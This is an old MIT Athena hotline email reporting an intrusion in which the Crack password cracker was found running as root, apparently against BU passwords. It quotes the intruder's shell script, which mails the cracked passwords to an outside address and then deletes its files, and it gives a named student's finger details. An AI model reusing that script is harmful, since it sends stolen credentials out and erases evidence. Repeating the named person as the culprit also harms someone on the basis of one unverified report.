[9190] in Hotline Meeting
Password Cracker
daemon@ATHENA.MIT.EDU (jsc@Athena.MIT.EDU)
Sun May 24 04:34:41 1992
From: jsc@Athena.MIT.EDU
Date: Sun, 24 May 92 04:34:28 -0400
To: hotline@Athena.MIT.EDU

Hi, didn't know who better to send this to; if this is the wrong place,
please forward it to the correct people.

Anyway, I found a program sucking up lots of processor time on both
m16-034-7 and m16-034-18:

USER       PID %CPU %MEM   SZ  RSS TT STAT    TIME COMMAND
root     17301 79.4 18.2 1260 1160 p0 R N  1977:39 /u1/qq/generic/prime -n19 -i /u1/qq/pws/pw.17166 Dicts/bigdict.Z

Looking in /u1/qq, I found the source and executable to Crack (renamed
prime), a password cracker, owned by UID 326. Looking over the
files, it looks like this person is trying to crack BU passwords from
MIT. In one of the files is the following:

#!/bin/sh
while (test -f Runtime/D*)
do
    sleep 60
done
sleep 30
cat Runtime/F* 2>&1 | mail -s 'Fb' lambast@buengf.bu.edu
cd ..
rm -rf qq
exit 0

finger lambast@buengf.bu.edu
[buengf.bu.edu]
Login name: lambast                     In real life: Ho Yi
Office: student
Directory: /usr3/home/lambast           Shell: /bin/tcsh
Last login Fri May 22 16:57 on ttytb from W20-575-20.MIT.E
No Plan.

Doing a last shows root logged in around May 22, 17:30, on both
machines and w20-575-20, for about 8 minutes.

A tar file of the contents of /u1/qq is in /mit/bitbucket/foo/qq.tar.

-Jin